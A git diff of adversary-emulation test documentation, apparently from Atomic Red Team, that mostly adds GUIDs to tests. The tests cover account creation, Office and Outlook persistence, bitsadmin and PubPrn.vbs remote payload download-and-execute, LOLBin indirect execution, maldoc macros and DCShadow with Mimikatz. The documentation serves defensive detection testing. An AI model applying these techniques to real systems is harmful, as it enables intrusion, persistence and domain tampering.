## Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON -Create a new account similar to ANONYMOUS LOGON in a command prompt. +auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 + +Create a new account similar to ANONYMOUS LOGON in a command prompt. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Username of the user to create | String | ANONYMOUS LOGON| | password | Password of the user to create | String | T1136_pass123!| @@ -86,15 +90,17 @@ net user "#{username}" >nul 2>&1 /del /domain
## Atomic Test #3 - Create a new Domain Account using PowerShell -Creates a new Domain User using the credentials of the Current User +auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 + +Creates a new Domain User using the credentials of the Current User **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | username | Name of the Account to be created | String | T1136.002_Admin| | password | Password of the Account to be created | String | T1136_pass123!| diff --git a/atomics/T1137.002/T1137.002.md b/atomics/T1137.002/T1137.002.md index 48f9de53..1fee5136 100644 --- a/atomics/T1137.002/T1137.002.md +++ b/atomics/T1137.002/T1137.002.md @@ -17,16 +17,18 @@ Adversaries may add this Registry key and specify a malicious DLL that will be e
## Atomic Test #1 - Office Application Startup Test Persistence + +auto_generated_guid: c3e35b58-fe1c-480b-b540-7600fb612563 + Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. Key is used for debugging purposes. Not created by default & exist in HKCU & HKLM hives. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.dll| diff --git a/atomics/T1137.004/T1137.004.md b/atomics/T1137.004/T1137.004.md index 858ef875..c7058537 100644 --- a/atomics/T1137.004/T1137.004.md +++ b/atomics/T1137.004/T1137.004.md @@ -13,17 +13,19 @@ Once malicious home pages have been added to the user’s mailbox, they will be
## Atomic Test #1 - Install Outlook Home Page Persistence + +auto_generated_guid: 7a91ad51-e6d2-4d43-9471-f26362f5738e + This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://) | string | file://PathToAtomicsFolder\T1137.004\src\T1137.004.html| | outlook_version | Version of Outlook that is installed | string | 16.0| diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md index 50c9c974..b8b4f65b 100644 --- a/atomics/T1137/T1137.md +++ b/atomics/T1137/T1137.md @@ -12,12 +12,14 @@ A variety of features have been discovered in Outlook that can be abused to obta
## Atomic Test #1 - Office Application Startup - Outlook as a C2 + +auto_generated_guid: bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c + As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands. This transform Outlook into a C2. Too achieve this two things must happened on the syste - The macro security registry value must be set to '4' - A file called VbaProject.OTM must be created in the Outlook Folder. - **Supported Platforms:** Windows diff --git a/atomics/T1140/T1140.md b/atomics/T1140/T1140.md index 71607740..fc670d0d 100644 --- a/atomics/T1140/T1140.md +++ b/atomics/T1140/T1140.md @@ -16,16 +16,18 @@ Sometimes a user's action may be required to open it for deobfuscation or decryp
## Atomic Test #1 - Deobfuscate/Decode Files Or Information + +auto_generated_guid: dc6fe391-69e6-4506-bd06-ea5eeb4082f8 + Encode/Decode executable Upon execution a file named T1140_calc_decoded.exe will be placed in the temp folder - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable | name of executable | path | C:\Windows\System32\calc.exe| @@ -52,15 +54,17 @@ del %temp%\T1140_calc_decoded.exe >nul 2>&1
## Atomic Test #2 - Certutil Rename and Decode -Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) +auto_generated_guid: 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 + +Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable | name of executable/file to decode | path | C:\Windows\System32\calc.exe| diff --git a/atomics/T1176/T1176.md b/atomics/T1176/T1176.md index 087753e7..a5a461b2 100644 --- a/atomics/T1176/T1176.md +++ b/atomics/T1176/T1176.md @@ -24,8 +24,10 @@ There have also been instances of botnets using a persistent backdoor through ma
## Atomic Test #1 - Chrome (Developer Mode) -Turn on Chrome developer mode and Load Extension found in the src directory +auto_generated_guid: 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 + +Turn on Chrome developer mode and Load Extension found in the src directory **Supported Platforms:** Linux, Windows, macOS @@ -50,8 +52,10 @@ tick 'Developer Mode'.
## Atomic Test #2 - Chrome (Chrome Web Store) -Install the "Minimum Viable Malicious Extension" Chrome extension +auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f + +Install the "Minimum Viable Malicious Extension" Chrome extension **Supported Platforms:** Linux, Windows, macOS @@ -73,8 +77,10 @@ in Chrome
## Atomic Test #3 - Firefox -Create a file called test.wma, with the duration of 30 seconds +auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 + +Create a file called test.wma, with the duration of 30 seconds **Supported Platforms:** Linux, Windows, macOS @@ -98,8 +104,10 @@ click "Load Temporary Add-on"
## Atomic Test #4 - Edge Chromium Addon - VPN -Adversaries may use VPN extensions in an attempt to hide traffic sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store. +auto_generated_guid: 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 + +Adversaries may use VPN extensions in an attempt to hide traffic sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store. **Supported Platforms:** Windows, macOS diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md index d0b70b42..55789fa2 100644 --- a/atomics/T1197/T1197.md +++ b/atomics/T1197/T1197.md @@ -22,16 +22,18 @@ BITS upload functionalities can also be used to perform [Exfiltration Over Alter
## Atomic Test #1 - Bitsadmin Download (cmd) + +auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421 + This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md| | local_file | Local file path to save downloaded file | path | %temp%\bitsadmin1_flag.ps1| @@ -57,18 +59,20 @@ del #{local_file} >nul 2>&1
## Atomic Test #2 - Bitsadmin Download (PowerShell) + +auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc + This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload leveraging PowerShell Upon execution you will find a github markdown file downloaded to the Temp directory - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md| | local_file | Local file path to save downloaded file | path | $env:TEMP\bitsadmin2_flag.ps1| @@ -94,18 +98,20 @@ Remove-Item #{local_file} -ErrorAction Ignore
## Atomic Test #3 - Persist, Download, & Execute + +auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae + This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transferand execute a payload in multiple steps. Note that in this test, the file executed is not the one downloaded. The downloading of a random file is simply the trigger for getting bitsdamin to run an executable. This has the interesting side effect of causing the executable (e.g. notepad) to run with an Initiating Process of "svchost.exe" and an Initiating Process Command Line of "svchost.exe -k netsvcs -p -s BITS" This job will remain in the BITS queue until complete or for up to 90 days by default if not removed. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_path | Path of command to execute | path | C:\Windows\system32\notepad.exe| | bits_job_name | Name of BITS job | string | AtomicBITS| @@ -138,18 +144,20 @@ del #{local_file} >nul 2>&1
## Atomic Test #4 - Bits download using desktopimgdownldr.exe (cmd) + +auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 + This test simulates using desktopimgdownldr.exe to download a malicious file instead of a desktop or lockscreen background img. The process that actually makes the TCP connection and creates the file on the disk is a svchost process (“-k netsvc -p -s BITS”) and not desktopimgdownldr.exe. See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_file | Remote file to download | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md| | download_path | Local file path to save downloaded file | path | SYSTEMROOT=C:\Windows\Temp| diff --git a/atomics/T1201/T1201.md b/atomics/T1201/T1201.md index f81368ed..9ed98eb9 100644 --- a/atomics/T1201/T1201.md +++ b/atomics/T1201/T1201.md @@ -24,8 +24,10 @@ Password policies can be set and discovered on Windows, Linux, and macOS systems
## Atomic Test #1 - Examine password complexity policy - Ubuntu -Lists the password complexity policy to console on Ubuntu Linux. +auto_generated_guid: 085fe567-ac84-47c7-ac4c-2688ce28265b + +Lists the password complexity policy to console on Ubuntu Linux. **Supported Platforms:** Linux @@ -48,8 +50,10 @@ cat /etc/pam.d/common-password
## Atomic Test #2 - Examine password complexity policy - CentOS/RHEL 7.x -Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. +auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d + +Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. **Supported Platforms:** Linux @@ -70,7 +74,7 @@ cat /etc/security/pwquality.conf ##### Description: System must be CentOS or RHEL v7 ##### Check Prereq Commands: ```bash -if [ $(rpm -q --queryformat '%{VERSION}') -eq "7" ]; then exit /b 0; else exit /b 1; fi; +if [ $(rpm -q --queryformat '%{VERSION}') -eq "7" ]; then exit /b 0; else exit /b 1; fi; ``` ##### Get Prereq Commands: ```bash @@ -84,8 +88,10 @@ echo Please run from CentOS or RHEL v7
## Atomic Test #3 - Examine password complexity policy - CentOS/RHEL 6.x -Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. +auto_generated_guid: 6ce12552-0adb-4f56-89ff-95ce268f6358 + +Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. **Supported Platforms:** Linux @@ -107,7 +113,7 @@ cat /etc/security/pwquality.conf ##### Description: System must be CentOS or RHEL v6 ##### Check Prereq Commands: ```bash -if [ $(rpm -q --queryformat '%{VERSION}') -eq "6" ]; then exit /b 0; else exit /b 1; fi; +if [ $(rpm -q --queryformat '%{VERSION}') -eq "6" ]; then exit /b 0; else exit /b 1; fi; ``` ##### Get Prereq Commands: ```bash @@ -121,8 +127,10 @@ echo Please run from CentOS or RHEL v6
## Atomic Test #4 - Examine password expiration policy - All Linux -Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. +auto_generated_guid: 7c86c55c-70fa-4a05-83c9-3aa19b145d1a + +Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. **Supported Platforms:** Linux @@ -145,8 +153,10 @@ cat /etc/login.defs
## Atomic Test #5 - Examine local password policy - Windows -Lists the local password policy to console on Windows. +auto_generated_guid: 4588d243-f24e-4549-b2e3-e627acc089f6 + +Lists the local password policy to console on Windows. **Supported Platforms:** Windows @@ -169,8 +179,10 @@ net accounts
## Atomic Test #6 - Examine domain password policy - Windows -Lists the domain password policy to console on Windows. +auto_generated_guid: 46c2c362-2679-4ef5-aec9-0e958e135be4 + +Lists the domain password policy to console on Windows. **Supported Platforms:** Windows @@ -193,8 +205,10 @@ net accounts /domain
## Atomic Test #7 - Examine password policy - macOS -Lists the password policy to console on macOS. +auto_generated_guid: 4b7fa042-9482-45e1-b348-4b756b2a0742 + +Lists the password policy to console on macOS. **Supported Platforms:** macOS diff --git a/atomics/T1202/T1202.md b/atomics/T1202/T1202.md index 4aab2fdb..3c32944b 100644 --- a/atomics/T1202/T1202.md +++ b/atomics/T1202/T1202.md @@ -16,17 +16,19 @@ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.
## Atomic Test #1 - Indirect Command Execution - pcalua.exe + +auto_generated_guid: cecfea7a-5f03-4cdd-8bc8-6f7c22862440 + The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface. [Reference](https://twitter.com/KyleHanslovan/status/912659279806640128) Upon execution, calc.exe should open - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | payload_path | Path to payload | path | C:\Windows\System32\calc.exe| | process | Process to execute | string | calc.exe| @@ -49,18 +51,20 @@ pcalua.exe -a #{payload_path}
## Atomic Test #2 - Indirect Command Execution - forfiles.exe + +auto_generated_guid: 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc + forfiles.exe may invoke the execution of programs and commands from a Command-Line Interface. [Reference](https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Forfiles.md) "This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe" Upon execution calc.exe will be opened - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | process | Process to execute | string | calc.exe| @@ -82,17 +86,19 @@ forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe
## Atomic Test #3 - Indirect Command Execution - conhost.exe + +auto_generated_guid: cf3391e0-b482-4b02-87fc-ca8362269b29 + conhost.exe refers to a host process for the console window. It provide an interface between command prompt and Windows explorer. Executing it through command line can create process ancestry anomalies [Reference] (http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | process | Process to execute | string | notepad.exe| diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md index fdd9a4c2..e5bc2484 100644 --- a/atomics/T1204.002/T1204.002.md +++ b/atomics/T1204.002/T1204.002.md @@ -28,19 +28,21 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
## Atomic Test #1 - OSTap Style Macro Execution + +auto_generated_guid: 8bebc690-18c7-4549-bc98-210f7019efff + This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns. References: https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | jse_path | Path for the macro to write out the "malicious" .jse file | String | C:\Users\Public\art.jse| | ms_product | Maldoc application Word or Excel | String | Word| @@ -72,7 +74,7 @@ try { $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -86,15 +88,17 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #2 - OSTap Payload Download -Uses cscript //E:jscript to download a file +auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80 + +Uses cscript //E:jscript to download a file **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js| | file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt| @@ -121,16 +125,18 @@ del #{script_file} /F /Q >nul 2>&1
## Atomic Test #3 - Maldoc choice flags command execution + +auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18 + This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched. Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | ms_product | Maldoc application Word or Excel | String | Word| @@ -157,7 +163,7 @@ try { $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -171,16 +177,18 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #4 - OSTAP JS version + +auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911 + Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | jse_path | jse file to execute with wscript | Path | C:\Users\Public\art.jse| | ms_product | Maldoc application Word or Excel | String | Word| @@ -208,7 +216,7 @@ try { $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -222,15 +230,17 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #5 - Office launching .bat file from AppData -Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. +auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa + +Microsoft Office creating then launching a .bat script from an AppData directory. The .bat file launches calc.exe when opened. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | bat_path | Path to malicious .bat file | String | $("$env:temp\art1204.bat")| | ms_product | Maldoc application Word or Excel | String | Word| @@ -258,7 +268,7 @@ try { $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -272,20 +282,22 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #6 - Excel 4 Macro + +auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 + This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious" VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec. A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated with Excel matches that of the local system. This username can be found under Files -> Options -> Username - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | download_url | Download URL | String | https://live.sysinternals.com/procexp.exe| | uname | Username for pathing | String | $env:Username| @@ -366,7 +378,7 @@ try { New-Object -COMObject "Excel.Application" | Out-Null Stop-Process -Name "Excel" exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -380,10 +392,12 @@ Write-Host "You will need to install Microsoft Excel manually to meet this requi
## Atomic Test #7 - Headless Chrome code execution via VBA + +auto_generated_guid: a19ee671-ed98-4e9d-b19c-d1954a51585a + This module uses Google Chrome combined with ScriptControl to achieve code execution. It spawns a local webserver hosting our malicious payload. Headless Google Chrome will then reach out to this webserver and pull down the script and execute it. By default the payload will execute calc.exe on the system. - **Supported Platforms:** Windows @@ -409,7 +423,7 @@ Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode try { $wdApp = New-Object -COMObject "Word.Application" Stop-Process -Name "winword" - exit 0 } catch { exit 1 } + exit 0 } catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -421,7 +435,7 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir try { $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -435,15 +449,17 @@ Write-Host "You will need to install Google Chrome manually to meet this require
## Atomic Test #8 - Potentially Unwanted Applications (PUA) -The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). +auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295 + +The Potentially Unwanted Applications (PUA) protection feature in antivirus software can identify and block PUAs from downloading and installing on endpoints in your network. These applications are not considered viruses, malware, or other types of threats, but might perform actions on endpoints that adversely affect their performance or use. This file is similar to EICAR test virus file, but is considered a Potentially Unwanted Application (PUA) instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | pua_url | url to PotentiallyUnwanted.exe | url | http://amtso.eicar.org/PotentiallyUnwanted.exe| | pua_file | path to PotentiallyUnwanted.exe | Path | $env:TEMP/PotentiallyUnwanted.exe| diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md index f34d481e..8c22bc80 100644 --- a/atomics/T1207/T1207.md +++ b/atomics/T1207/T1207.md @@ -14,6 +14,9 @@ This technique may bypass system logging and security monitors such as security
## Atomic Test #1 - DCShadow - Mimikatz + +auto_generated_guid: 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 + Use Mimikatz DCShadow method to simulate behavior of a Domain Controller and edit protected attribute. [DCShadow](https://www.dcshadow.com/) @@ -24,14 +27,13 @@ Get-ADObject -LDAPFilter '(samaccountname=)' -Properties badpwdcount | sel Need SYSTEM privileges locally (automatically obtained via PsExec, so running as admin is sufficient), and Domain Admin remotely. The easiest is to run elevated and as a Domain Admin user. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | object | Targeted object (for machine account do not forget to add final '$') | string | bruce.wayne| | attribute | Object attribute to edit, interesting ones: badpwdcount, primaryGroupId, SIDHistory... | string | badpwdcount| @@ -79,7 +81,7 @@ Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore ##### Check Prereq Commands: ```powershell $mimikatz_path = cmd /c echo #{mimikatz_path} -if (Test-Path $mimikatz_path) {exit 0} else {exit 1} +if (Test-Path $mimikatz_path) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -92,7 +94,7 @@ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} +if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1216.001/T1216.001.md b/atomics/T1216.001/T1216.001.md index 629309d6..66a7732e 100644 --- a/atomics/T1216.001/T1216.001.md +++ b/atomics/T1216.001/T1216.001.md @@ -12,15 +12,17 @@
## Atomic Test #1 - PubPrn.vbs Signed Script Bypass -Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload. +auto_generated_guid: 9dd29a1f-1e16-4862-be83-913b10a88f6c + +Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_payload | A remote payload to execute using PubPrn.vbs. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct| diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md index d14d2c8b..c73cfd7b 100644 --- a/atomics/T1216/T1216.md +++ b/atomics/T1216/T1216.md @@ -12,16 +12,18 @@
## Atomic Test #1 - SyncAppvPublishingServer Signed Script PowerShell Command Execution + +auto_generated_guid: 275d963d-3f36-476c-8bef-a2a3960ee6eb + Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command. Upon execution, calc.exe will be launched. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_execute | A PowerShell command to execute. | string | Start-Process calc| @@ -42,15 +44,17 @@ C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}"
## Atomic Test #2 - manage-bde.wsf Signed Script Command Execution -Executes the signed manage-bde.wsf script with options to execute an arbitrary command. +auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a + +Executes the signed manage-bde.wsf script with options to execute an arbitrary command. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_execute | A command to execute. | Path | %windir%\System32\calc.exe| diff --git a/atomics/T1217/T1217.md b/atomics/T1217/T1217.md index 0635173c..a7ef7b04 100644 --- a/atomics/T1217/T1217.md +++ b/atomics/T1217/T1217.md @@ -26,15 +26,17 @@ Specific storage locations vary based on platform and/or application, but browse
## Atomic Test #1 - List Mozilla Firefox Bookmark Database Files on Linux -Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file. +auto_generated_guid: 3a41f169-a5ab-407f-9269-abafdb5da6c2 + +Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed. | Path | /tmp/T1217-Firefox.txt| @@ -60,15 +62,17 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #2 - List Mozilla Firefox Bookmark Database Files on macOS -Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file. +auto_generated_guid: 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b + +Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file. **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed. | Path | /tmp/T1217_Firefox.txt| @@ -94,15 +98,17 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #3 - List Google Chrome Bookmark JSON Files on macOS -Searches for Google Chrome's Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file. +auto_generated_guid: b789d341-154b-4a42-a071-9111588be9bc + +Searches for Google Chrome's Bookmark file (on macOS) that contains bookmarks in JSON format and lists any found instances to a text file. **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where captured results will be placed. | Path | /tmp/T1217-Chrome.txt| @@ -128,9 +134,11 @@ rm -f #{output_file} 2>/dev/null
## Atomic Test #4 - List Google Chrome Bookmarks on Windows with powershell + +auto_generated_guid: faab755e-4299-48ec-8202-fc7885eb6545 + Searches for Google Chromes's Bookmarks file (on Windows distributions) that contains bookmarks. Upon execution, paths that contain bookmark files will be displayed. - **Supported Platforms:** Windows @@ -153,9 +161,11 @@ Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyCo
## Atomic Test #5 - List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt + +auto_generated_guid: 76f71e2f-480e-4bed-b61e-398fe17499d5 + Searches for Google Chromes's and Edge Chromium's Bookmarks file (on Windows distributions) that contains bookmarks. Upon execution, paths that contain bookmark files will be displayed. - **Supported Platforms:** Windows @@ -178,9 +188,11 @@ where /R C:\Users\ Bookmarks
## Atomic Test #6 - List Mozilla Firefox bookmarks on Windows with command prompt + +auto_generated_guid: 4312cdbc-79fc-4a9c-becc-53d49c734bc5 + Searches for Mozilla Firefox bookmarks file (on Windows distributions) that contains bookmarks in a SQLITE database. Upon execution, paths that contain bookmark files will be displayed. - **Supported Platforms:** Windows @@ -203,8 +215,10 @@ where /R C:\Users\ places.sqlite
